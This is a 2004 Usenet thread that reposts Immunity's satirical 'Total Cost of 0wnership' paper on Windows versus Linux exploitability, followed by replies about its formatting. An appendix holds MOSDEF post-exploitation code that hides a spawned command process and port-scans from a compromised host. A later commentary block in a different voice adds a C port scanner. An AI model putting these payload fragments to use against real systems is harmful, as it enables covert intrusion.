total cost of 0wn3rsh1p


starwars

www.immunitysec.com/downloads/tc0.pdf

Microsoft has long asked third party analysts for accurate assessments of
the total cost of ownership of Microsoft Windows deployments, especially
against the Linux deployments commonly going into all segments of the
market. However, Immunity, Inc. as a third party assessment provider has,
until now, not done a thorough analysis, using Immunity proprietary data
to tell the true story about the costs of Open Source. Other sources of
3rd party information can be found here:
http://www.microsoft.com/mscorp/facts/default.asp

The point of contact for this paper is Dave Aitel, Vice President of
Media Relations, Immunity, Inc. He can be reached (e-mail address
removed). Further information on Immunity, Inc. is available at
http://www.immunitysec.com.

Executive Summary

Based on our analysis, Microsoft Windows has one half the Total Cost of
0wnership (TC0) of modern Fedora Core Linux based technologies.

[Chart: "Difficulty of owning Windows vs. Difficulty to make this graph";
bars labelled OpenOffice and Windows]

Immunity's Methodology

Immunity has four major services: Training on exploit development and
vulnerability analysis, Application Security Consulting, the CANVAS
assessment product, and the Immunity Vulnerability Sharing Club. In each
of these, the costs to penetrate (0wn) systems based on Microsoft Windows
Technologies were compared to the costs against a modern Linux system.
In general there are three aspects to 0wning a system. These three
things, Vulnerability Detection, Exploit Development, and Attack
Execution, were used by Immunity to determine the costs to 0wn the
different operating systems in configurations encountered during
Immunity engagements. As Immunity is not in the rootkit
(www.rootkit.com) writing business, this paper does not cover the costs
of maintaining 0wnership over a given OS.

Vulnerability Detection

There are several factors that affect how difficult it is to find
vulnerabilities on a target platform. Some of these are listed below.
Immunity's judgments are drawn from our current collection of remote
0day in the VSC, countless 0day in custom applications for Immunity
Consulting customers across many different operating systems and over
80 remote exploits in CANVAS.

Portability of common exploit development tools

IDA Pro, the premier disassembler and reverse engineering tool (a
database and a disassembler together make for a powerful combination),
is able to disassemble both Linux and Windows binaries, but only runs on
Windows. A Linux version is, however, rumored to be in the works.

PDB (Python Debugger), Immunity's newest tool in the armory, is
available only for Windows (although the client is available on both
Linux and Windows). This tool allows for many advanced scripts to be
run, widely automating the exploit development process.

OllyDbg (Visual Debugger) is far superior to GDB in many ways needed for
exploit development. In addition, WinDbg and SoftICE provide valuable
options for debugging at the kernel and user level.

The TC0 advantage is clearly obvious for the Windows platform.

Availability of Fish

Finding a vulnerability is like finding a fish. If the pond is
overfished, it's harder to find them. Hackers are rather evenly split
between running Linux and running Mac OS X. As much as few professional
NASCAR drivers drive Dodge Neons, a negligible amount of skilled hackers
use Windows as their primary OS. Not to mention, many Win32 fish are
given out for free by Microsoft when releasing patches. (See
http://sabre-security.com/ for BinDiff.)

Here, there can be only one option. Even extremely modern versions of
Windows have a TC0 much lower than older Linuxes.

Time to 0day

Immunity's team is typically tasked with three major fronts at a time.
One front, to develop old exploits for CANVAS, is ongoing. The second,
to develop new infrastructure for CANVAS. The third, to assess major
system components of various operating systems and products to discover
new vulnerabilities. The time between Immunity management requesting a
vulnerability against a particular operating system and one of
Immunity's researchers delivering a suitable vulnerability is described
as the "Time to 0day". This TT0 provides a convenient metric for the
process of vulnerability discovery under different operating systems.

  Operating System        Number of 0day   Average Time
  Mac OS X                3                1 hour
  Windows 2000/XP/2003    4                3 days
  Linux (FC2)             3                6 days

As clearly demonstrated, other than the toy OS Mac OS X, Windows has the
lowest TC0 on the market.

Exploit Development

There are many levels of defenses in a modern operating system. Each of
these has implementation weaknesses and strengths. Overall, Windows has
a large advantage in TC0 as demonstrated by the following sections.

Kernel-level defenses

Exec Shield comes by default with Fedora Core 1 and 2; a superior
protection, PaX, can be installed at no cost. Notably, this protection
does not prevent Linux from being 0wned when a third party program is
installed. Unreal Tournament is a good example of a program which has an
executable stack when installed even on Fedora Core 2. With PaX
installed, even the kernel has moderate levels of protection against
standard buffer overflow attacks.

PaX is a great example of a kernel level protection done by a third
party. In the Open Source community, protections compete by their merit.
In the Windows community, it is impossible to have a good kernel level
protection implemented by a vendor other than Microsoft, which allows
for greater manageability by both users and hackers. Hence, out of the
box Windows has no protection of this nature at all. Windows XP SP2
plans to support W^X style protection (somewhat weaker than Exec
Shield!) but only with hardware support [1]. Currently, this means that
NX is not available, and it most likely will not be widely deployed for
some time on the Windows platform.

In addition, kernel layer segmentation provided by chroot() can often be
a nightmare when exploiting Linux. While group policies and other
complex ACLs can sometimes be deployed on the Windows Platform, this is
comparatively rare, and often, due to sheer complexity, easily worked
around.

The TC0 advantage is clearly for the Windows Platform.

Executable Defenses

Various options assigned to the compiler and system libraries can make a
big difference in platform exploitability, and hence, TC0. These are
detailed below.

Compiler defenses

Both Linux and Windows come with stack canaries built into their
compilers. In Linux, this is via ProPolice, and in Windows, via /GS.
Both are reasonably equivalent, except that Win32 processes have an
overly complex exception management procedure, which tends to make
overcoming such protections a lot easier than on Linux. Windows binaries
currently undergo some advanced vulnerability detection routines
(PREfix and PREfast) as well. These measures are currently ineffective
but may raise the TC0 of Windows in the future.

[1] Software support is limited and given in some small detail at the
URL below. It is not general purpose protection at the level of PaX or
Exec Shield.
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2mempr.mspx

Library Defenses

Modern Windows (as of XP SP2) contains heap overflow protection. This
raises its TC0 dramatically, but is not yet in production and has not
been considered for this survey.

Shellcode, MOSDEF and other Exploit Infrastructure

Immunity CANVAS employs an advanced exploit payload system known as
MOSDEF. This system allows for "C remoting" across host boundaries. For
example, after you attack a system running Fedora Core 2, you can then
have the MOSDEF system run a TCP portscanner module on that target and
send you back the results. It does this by compiling a C proglet into
shellcode, and having it executed in the remote system's process space.

So one of the major factors when building CANVAS for each platform was
"How much does it cost to build MOSDEF for that platform?" This is
complicated by the costs of MOSDEF that are spread across both
platforms, for example the C compiler and the X86 assembler. So one must
do comparisons based on the costs of creating platform specific changes.
This is mostly relegated to the initial stages of an exploit's shellcode
and to special effects.

On Linux, system calls go directly to the kernel, but on Windows, you
must first traverse user-land level libraries such as kernel32.dll. This
major architectural difference has conflicting results. At first, it
makes things much harder, as the process heaps must be cleaned up before
you can proceed to using socket calls and establishing outbound
connections. However, once this is done, the full Win32 API is then
available to you, and you can use it without reimplementing libc, as you
have to do in Linux. This makes post-exploit development much easier, as
shown by the code fragment in Appendix A.

Static Addresses

A modern Linux has few static addresses. Windows, on the other hand, has
thousands of different global variables an exploit developer can use to
exploit a target. The PEB is just one example.

Attack Execution

There are quite a few places where running your attacks against a target
can be a difficult and painful experience. Remote manageability,
patching, and other areas are places where Windows truly shines. For
these reasons, we find that the Windows advantage in Total Cost of
0wnership extends to every level of our testing.

Patch Maintenance

Both Fedora Core and Windows systems include automatic patch updating.
However, only Fedora Core supports non core OS products, such as image
manipulation programs. As such, Fedora Core is more likely to be updated
than Windows systems.

User Error

Few Windows users can identify the purpose of all the processes running
on their system. Even fewer know what tool to use to discover which
processes are listening on which ports. In Linux, this is built into the
netstat program. It's unlikely a Windows user will even know how to
determine which users are able to log in remotely to their system.
Adding new capabilities to users is a common and entirely effective way
to backdoor a Windows system.

Summary

Immunity's findings clearly show that the best platform for your targets
to be running is Microsoft Windows, allowing you unparalleled value for
their dollar. This result reinforces the fact that it's important to
consider more than just licensing fees when your targets choose their
OS. Indeed, a variety of factors go into their choice, and over time,
Windows has demonstrated itself to be the top contender, in both the
server and the desktop space, for Total Cost of 0wnership.
Appendix A - MOSDEF examples

A Win32 popen() fragment in MOSDEF

vars={}
vars["command"]=command
vars["cmdexe"]=cmdexe
vars["stdin"]=hChildStdinRd
vars["stdout"]=hChildStdoutWr
code="""
#import "local","sendint" as "sendint"
#import "remote","kernel32.dll|GetStartupInfoA" as "getstartupinfoa"
#import "remote","kernel32.dll|CreateProcessA" as "createprocessa"
#import "string","cmdexe" as "cmdexe"
#import "string","command" as "command"
#import "local", "memset" as "memset"
#import "int", "stdin" as "stdin"
#import "int", "stdout" as "stdout"

struct STARTUPINFO {
    int cb;
    char * lpReserved;
    char * lpDesktop;
    char * lpTitle;
    int dwX;
    int dwY;
    int dwXSize;
    int dwYSize;
    int dwXCountChars;
    int dwYCountChars;
    int dwFillAttribute;
    int dwFlags;
    short int wShowWindow;
    short int cbReserved2;
    int * lpReserved2;
    int hStdInput;
    int hStdOutput;
    int hStdError;
};

void main() {
    struct STARTUPINFO si;
    int inherithandles;
    int i;
    char pi[32];            // receives PROCESS_INFORMATION (16 bytes on Win32)

    memset(pi,0,16);
    inherithandles=1;       // child inherits the pipe handles passed in stdin/stdout
    getstartupinfoa(&si);
    si.dwFlags=0x0101;      // STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
    si.wShowWindow=0;       // SW_HIDE: no console window on the target
    si.hStdInput=stdin;
    si.hStdOutput=stdout;
    si.hStdError=stdout;
    i=createprocessa(cmdexe,command,0,0,inherithandles,0,0,0,&si,pi);
    sendint(i);             // report CreateProcessA's return value to CANVAS
}
"""
request=self.compile(code,vars)
self.sendrequest(request)
ret=self.readint()

A Linux TCP Portscanner in MOSDEF

vars={}
vars["startip"]=startip
vars["numberofips"]=numberofips
vars["AF_INET"]=AF_INET
vars["SOCK_STREAM"]=SOCK_STREAM
vars["startport"]=startport
vars["endport"]=endport

code="""
#import "local", "connect" as "connect"
#import "local", "close" as "close"
#import "local", "socket" as "socket"
#import "local", "sendint" as "sendint"
#import "local", "htons" as "htons"
#import "local", "htonl" as "htonl"
#import "int", "startip" as "startip"
#import "int", "startport" as "startport"
#import "int", "endport" as "endport"
#import "int", "numberofips" as "numberofips"
#import "int", "AF_INET" as "AF_INET"
#import "int", "SOCK_STREAM" as "SOCK_STREAM"
#include "socket.h"

void main()
{
    int currentport;
    int sockfd;
    int doneips;
    int currentip;

    struct sockaddr_in serv_addr;
    serv_addr.family=AF_INET;
    currentip=startip;
    doneips=0;

    while (doneips < numberofips) {          // FOR EACH IP...
        doneips=doneips+1;
        serv_addr.addr=htonl(currentip);
        currentport=startport;
        while (currentport <= endport) {     // FOR EACH PORT (inclusive range)
            sockfd=socket(AF_INET,SOCK_STREAM,0);
            serv_addr.port=htons(currentport);
            if (connect(sockfd,&serv_addr,16)==0) {
                sendint(currentport);        // open port: report it to CANVAS
            }
            close(sockfd);
            currentport=currentport+1;
        }
        currentip=currentip+1;
    }
    sendint(0xffffffff);                     // -1 marks the end of the scan
}
"""
request=self.compile(code,vars)
self.sendrequest(request)

# Collect open ports as the proglet reports them, until the -1 terminator.
port=0
openports=[]
while port!=-1:
    port=self.readint()
    if port!=-1:
        openports.append(port)
return openports
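The portscanner proglet above relies on the point made in the MOSDEF section: on Linux the payload can talk to the kernel directly instead of going through libc. As an added example (not from the Immunity paper and not MOSDEF code), here is the same connect scan as ordinary C that issues socket/connect/close by syscall number through libc's syscall(), plus the timeout a real scanner needs so that a filtered port (packets silently dropped) is reported rather than hanging the loop. It assumes an x86-64 or aarch64 Linux host (i386 multiplexes these calls through socketcall, so the numbers differ there); poll() and getsockopt() are used through libc for brevity, and open_test_listener() is a test fixture of my own, not part of any tool.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <poll.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/syscall.h>

enum probe_result { PORT_CLOSED = 0, PORT_OPEN = 1, PORT_FILTERED = 2, PROBE_ERROR = -1 };

/* Direct kernel entry by syscall number, the way a Linux shellcode stub
 * would do it; no libc socket()/connect()/close() wrappers involved. */
static long sys_socket(int domain, int type, int proto) {
    return syscall(SYS_socket, domain, type, proto);
}
static long sys_connect(int fd, const struct sockaddr *sa, socklen_t len) {
    return syscall(SYS_connect, fd, sa, len);
}
static long sys_close(int fd) {
    return syscall(SYS_close, fd);
}

/* Probe one TCP port. Non-blocking connect + poll gives three outcomes:
 * SYN/ACK (open), RST (closed) or nothing within timeout_ms (filtered). */
int probe_port(uint32_t ip_host_order, uint16_t port, int timeout_ms) {
    struct sockaddr_in sa;
    struct pollfd pfd;
    int soerr = 0;
    socklen_t slen = sizeof soerr;
    int result = PROBE_ERROR;
    long fd = sys_socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0);
    if (fd < 0) return PROBE_ERROR;

    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = htonl(ip_host_order);

    if (sys_connect((int)fd, (struct sockaddr *)&sa, sizeof sa) == 0) {
        result = PORT_OPEN;              /* loopback may complete at once */
    } else if (errno == EINPROGRESS) {
        pfd.fd = (int)fd;
        pfd.events = POLLOUT;
        int n = poll(&pfd, 1, timeout_ms);
        if (n == 0) {
            result = PORT_FILTERED;      /* no answer at all: dropped */
        } else if (n > 0 && getsockopt((int)fd, SOL_SOCKET, SO_ERROR, &soerr, &slen) == 0) {
            result = soerr == 0 ? PORT_OPEN
                   : soerr == ECONNREFUSED ? PORT_CLOSED : PROBE_ERROR;
        }
    } else if (errno == ECONNREFUSED) {
        result = PORT_CLOSED;
    }
    sys_close((int)fd);
    return result;
}

/* Scan [startport, endport] inclusive on one host, like the proglet's inner
 * loop; open ports go into out (up to max) and the count is returned. */
size_t scan_range(uint32_t ip, uint16_t startport, uint16_t endport,
                  int timeout_ms, uint16_t *out, size_t max) {
    size_t found = 0;
    for (unsigned p = startport; p <= endport; p++) {
        if (probe_port(ip, (uint16_t)p, timeout_ms) == PORT_OPEN && found < max)
            out[found++] = (uint16_t)p;
    }
    return found;
}

/* Test fixture (constructed for this example): a listener on 127.0.0.1 with
 * a kernel-chosen port, so there is a known-open port without touching the
 * network. Returns the listening fd and writes the port to *port_out. */
int open_test_listener(uint16_t *port_out) {
    struct sockaddr_in sa;
    socklen_t len = sizeof sa;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    sa.sin_port = 0;
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) < 0 || listen(fd, 8) < 0 ||
        getsockname(fd, (struct sockaddr *)&sa, &len) < 0) {
        close(fd);
        return -1;
    }
    *port_out = ntohs(sa.sin_port);
    return fd;
}

int main(void) {
    uint16_t lport, open_ports[8];
    int lfd = open_test_listener(&lport);
    if (lfd < 0) { perror("listener"); return 1; }
    size_t n = scan_range(INADDR_LOOPBACK, lport - 1, lport + 1, 500, open_ports, 8);
    for (size_t i = 0; i < n; i++)
        printf("127.0.0.1:%u open\n", open_ports[i]);
    close(lfd);
    return 0;
}
```

The proglet's blocking connect() is fine against a host that answers every port with SYN/ACK or RST, but against a firewalled host each filtered port costs a full TCP connect timeout; the PORT_FILTERED branch is the part a practitioner would add before pointing this at anything but loopback.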
 

Me

On Sun, 22 Aug 2004 23:29:20 +0200 (CEST), starwars wrote:

<SNIP a lot of non coherent crap>

Please don't smoke crack, and write Usenet articles, during the same night.
 

Michael

Me said:
On Sun, 22 Aug 2004 23:29:20 +0200 (CEST), starwars wrote:

<SNIP a lot of non coherent crap>

Please don't smoke crack, and write Usenet articles, during the same night.

I found it perfectly coherent. Did you even read it?

michael
 

Me

I found it perfectly coherent. Did you even read it?

michael

It would be much more readable, and more obviously a professional document, if
the OP had properly used:
1) Spaces where appropriate.
2) Paragraphs, separated by blank lines!
3) Adjustment of line breaks so as not to trash URLs.

This is what a portion of it looked like in my newsreader:

Microsoft has long asked third party analysts for accurateassessments of
the total cost of ownership of Microsoft Windowsdeployments, especially
against the Linux deployments commonlygoing into all segments of the
market. However, Immunity, Inc. as athird party assessment provider has,
until now, not done a thoroughanalysis, using Immunity proprietary data
to tell the true story aboutthe costs of Open Source. Other sources of
3rdparty information can be found
here:http://www.microsoft.com/mscorp/facts/default.aspThe point of
contact for this paper is Dave Aitel, Vice President ofMedia Relations,
Immunity, Inc. He can be reached (e-mail address removed). Further
information on Immunity, Inc. isavailable at
http://www.immunitysec.com.Executive SummaryBased on our analysis,
Microsoft Windows has one half the Total Costof 0wnership (TC0) of modern
Fedora Core Linux based
technologies.ƒ´ƒÙƒÖƒÖƒÙƒÓƒåƒÜƒäƒéƒnƒßƒÖƒnƒßƒçƒÞƒÙƒÞƒ×ƒnƒÇƒÙƒÞƒÔƒßƒçƒãƒnƒæƒãƒ´ƒÙƒÖƒÖƒÙƒÓ
ƒåƒÜƒäƒéƒnƒäƒßƒnƒÝƒÑƒÛƒÕƒnƒäƒØƒÙƒãƒnƒ×ƒâƒÑƒàƒØƒ¿ƒàƒÕƒÞƒ¿ƒÖƒÖƒÙƒÓƒÕ
ƒÇƒÙƒÞƒÔƒßƒçƒãImmunity's MethodologyImmunity has four major services: Training

on exploit developmentand vulnerability analysis, Application Security
Consulting, theCANVAS assessment product, and the Immunity Vulnerability
SharingClub.

Is that perfectly coherent?

BTW, please read this advice on munging:
<http://members.aol.com/emailfaq/mungfaq.html#how-not-mung>